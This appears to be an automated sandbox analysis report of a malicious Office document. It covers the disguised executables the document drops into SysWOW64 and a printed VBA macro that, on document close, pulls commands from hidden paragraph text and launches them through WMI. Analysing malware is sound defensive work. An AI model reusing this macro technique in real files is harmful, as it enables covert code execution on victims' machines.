Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 00:17:56 |
Start date: | 27/05/2021 |
Path: | C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:17:59 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\mfcm140\normaliz.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:01 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\clip\mmcshext.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:03 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\regedt32\ir50_qcx.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:05 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:07 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:09 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\oleaccrc\TSChannel.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:12 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\iprtrmgr\qdvd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:14 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
9 | #if VBA7 then |
10 | Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One as Long) as Long |
11 | #else |
12 | Private Declare Function Sleep Lib "Kernel32" (ByVal One as Long) as Long |
13 | #endif |
14 | Private Ms13 |
15 | Private One as String |
16 | Private Two as String |
17 | Private STP as String |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
CreateObject | CreateObject( |
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
Delete | |
Part of subcall function SaveAs3@ThisDocument: SaveAs2 | |
Part of subcall function SaveAs3@ThisDocument: wdFormatText | |
Part of subcall function SaveAs3@ThisDocument: SaveAs2 | |
Part of subcall function SaveAs3@ThisDocument: wdFormatText | |
Part of subcall function SetTask@ThisDocument: create | |
Part of subcall function SetTask@ThisDocument: act | |
Kernel32!Sleep | Kernel32!Sleep( |
Part of subcall function SetTask@ThisDocument: create | |
Part of subcall function SetTask@ThisDocument: act |
Strings | Decrypted Strings |
---|---|
"xls" | |
"doc" |
Line | Instruction | Meta Information |
---|---|---|
22 | Private Sub Form_Close() | |
23 | STP = Button_Click2(2, 16) + "Ksh1" | executed |
24 | Set Ms13 = CreateObject(Button_Click2(4, 22)) | CreateObject( |
25 | One = Button_Click2(8, 16) | |
26 | Two = Button_Click2(6, 8) | |
27 | ActiveDocument.Range(Start := 0, End := 3561).Delete | Delete |
28 | SaveAs3 ("xls") | |
28 | SaveAs3 ("doc") | |
29 | SetTask (One + " " + STP + ".xls " + STP + ".pdf") | |
29 | Sleep 6000 | Kernel32!Sleep( |
29 | SetTask (Two + " " + STP + ".pdf,In") | |
30 | End Sub |
APIs | Meta Information |
---|---|
Part of subcall function Form_Close@ThisDocument: CreateObject | |
Part of subcall function Form_Close@ThisDocument: Delete | |
Part of subcall function Form_Close@ThisDocument: Sleep |
Line | Instruction | Meta Information |
---|---|---|
19 | Private Sub Document_Close() | |
20 | Form_Close | executed |
21 | End Sub |
APIs | Meta Information |
---|---|
create | SWbemObjectEx.create( |
act |
Line | Instruction | Meta Information |
---|---|---|
40 | Private Function SetTask(Task as String) | |
41 | Ms13.create Task, Null, Null, act | SWbemObjectEx.create( act executed |
42 | End Function |
APIs | Meta Information |
---|---|
Left | |
Paragraphs |
Line | Instruction | Meta Information |
---|---|---|
31 | Private Function Button_Click2(One as Long, Two as Long) as String | |
32 | Button_Click2 = Left(ActiveDocument.Paragraphs(One).Range.Text, Two) | Left Paragraphs executed |
33 | End Function |
APIs | Meta Information |
---|---|
SaveAs2 | |
wdFormatText |
Line | Instruction | Meta Information |
---|---|---|
37 | Private Function SaveAs3(Formt as String) | |
38 | ActiveDocument.SaveAs2 FileName := STP + "." + Formt, FileFormat := wdFormatText | SaveAs2 wdFormatText executed |
39 | End Function |
Non-Executed Functions |
---|
APIs | Meta Information |
---|---|
Right | |
Text | |
Range |
Line | Instruction | Meta Information |
---|---|---|
34 | Private Function Button_Click3(One as Long) as String | |
35 | Button_Click3 = Right(Range.Text, One) | Right Text Range |
36 | End Function |
Executed Functions |
---|
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00649860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
C-Code - Quality: 73% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 006438F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
C-Code - Quality: 63% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 64% |
|
APIs |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 006480A0, Relevance: 1.7, APIs: 1, Instructions: 219fileCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004197A0, Relevance: 341.2, APIs: 167, Strings: 27, Instructions: 1699COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00415D80, Relevance: 188.2, APIs: 105, Strings: 2, Instructions: 932COMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00422660, Relevance: 19.6, APIs: 13, Instructions: 112COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00648400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 62% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00647120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
C-Code - Quality: 85% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00644B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
C-Code - Quality: 60% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 006430A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00645CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
C-Code - Quality: 100% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00402064, Relevance: 1.8, APIs: 1, Instructions: 278COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 75% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 006442C0, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
C-Code - Quality: 79% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00620170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 006465E0, Relevance: 12.9, APIs: 2, Strings: 5, Instructions: 647COMMONCrypto
C-Code - Quality: 81% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 59% |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00648970, Relevance: 2.7, Strings: 2, Instructions: 165COMMON
C-Code - Quality: 65% |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 66% |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00643F00, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
C-Code - Quality: 100% |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00406DA8, Relevance: .2, Instructions: 240COMMONCrypto
C-Code - Quality: 81% |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00409350, Relevance: .2, Instructions: 205COMMONCrypto
C-Code - Quality: 65% |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004052D4, Relevance: .1, Instructions: 58COMMON
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0040314D, Relevance: .0, Instructions: 47COMMONCrypto
C-Code - Quality: 46% |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00644DF0, Relevance: .0, Instructions: 2COMMON
C-Code - Quality: 100% |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041FEF0, Relevance: 75.4, APIs: 28, Strings: 15, Instructions: 199COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041BC40, Relevance: 69.4, APIs: 46, Instructions: 433COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00424570, Relevance: 54.2, APIs: 36, Instructions: 238COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041E780, Relevance: 51.3, APIs: 34, Instructions: 295COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00418DC0, Relevance: 42.3, APIs: 28, Instructions: 336COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 18% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041D540, Relevance: 39.2, APIs: 26, Instructions: 247COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041E450, Relevance: 37.8, APIs: 25, Instructions: 257COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041EDC0, Relevance: 37.8, APIs: 25, Instructions: 257COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041DB10, Relevance: 37.8, APIs: 25, Instructions: 257COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041EB10, Relevance: 37.7, APIs: 25, Instructions: 217COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 29% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00417770, Relevance: 33.3, APIs: 22, Instructions: 277COMMON
C-Code - Quality: 20% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041D030, Relevance: 30.2, APIs: 20, Instructions: 216COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041C8E0, Relevance: 30.2, APIs: 20, Instructions: 162COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004241F0, Relevance: 28.6, APIs: 19, Instructions: 123COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041DE40, Relevance: 27.1, APIs: 18, Instructions: 148COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004183D0, Relevance: 25.7, APIs: 17, Instructions: 159COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041C250, Relevance: 24.2, APIs: 16, Instructions: 166COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041C490, Relevance: 24.2, APIs: 16, Instructions: 160COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00423A30, Relevance: 21.2, APIs: 14, Instructions: 175COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 22% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041DC50, Relevance: 18.1, APIs: 12, Instructions: 138COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041E590, Relevance: 18.1, APIs: 12, Instructions: 138COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041EF00, Relevance: 18.1, APIs: 12, Instructions: 138COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041F1A0, Relevance: 16.6, APIs: 11, Instructions: 93COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041E210, Relevance: 16.6, APIs: 11, Instructions: 93COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00424480, Relevance: 16.6, APIs: 11, Instructions: 62COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00416890, Relevance: 15.1, APIs: 10, Instructions: 123COMMON
C-Code - Quality: 20% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004221F0, Relevance: 15.1, APIs: 10, Instructions: 114COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041D400, Relevance: 15.1, APIs: 10, Instructions: 86COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00620010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
Strings |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 16% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041CCA0, Relevance: 12.1, APIs: 8, Instructions: 100COMMON
C-Code - Quality: 23% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00416AA0, Relevance: 12.1, APIs: 8, Instructions: 70COMMON
C-Code - Quality: 20% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00421270, Relevance: 12.0, APIs: 8, Instructions: 49COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041CE20, Relevance: 10.6, APIs: 7, Instructions: 95COMMON
C-Code - Quality: 27% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 24% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041E040, Relevance: 10.6, APIs: 7, Instructions: 69COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041D830, Relevance: 10.6, APIs: 7, Instructions: 69COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00424100, Relevance: 10.6, APIs: 7, Instructions: 67COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 006206F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00426970, Relevance: 9.1, APIs: 6, Instructions: 85COMMON
C-Code - Quality: 30% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 46% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 31% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 31% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 31% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 24% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 006208F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041DA00, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00421610, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004217D0, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 22% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 48% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041C7C0, Relevance: 6.1, APIs: 4, Instructions: 70COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00415200, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
C-Code - Quality: 17% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00415B80, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
C-Code - Quality: 17% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041E380, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00421FA0, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00422080, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00421CC0, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00421C10, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 49% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 45% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 52% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Executed Functions |
---|
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F8E80, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131serviceCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
C-Code - Quality: 63% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 61% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F9860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
C-Code - Quality: 73% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 62% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F7120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
C-Code - Quality: 85% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
C-Code - Quality: 60% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F80A0, Relevance: 3.2, APIs: 2, Instructions: 219fileCOMMON
C-Code - Quality: 71% |
|
APIs |
Memory Dump Source |
|
|
Yara matches |
Similarity |
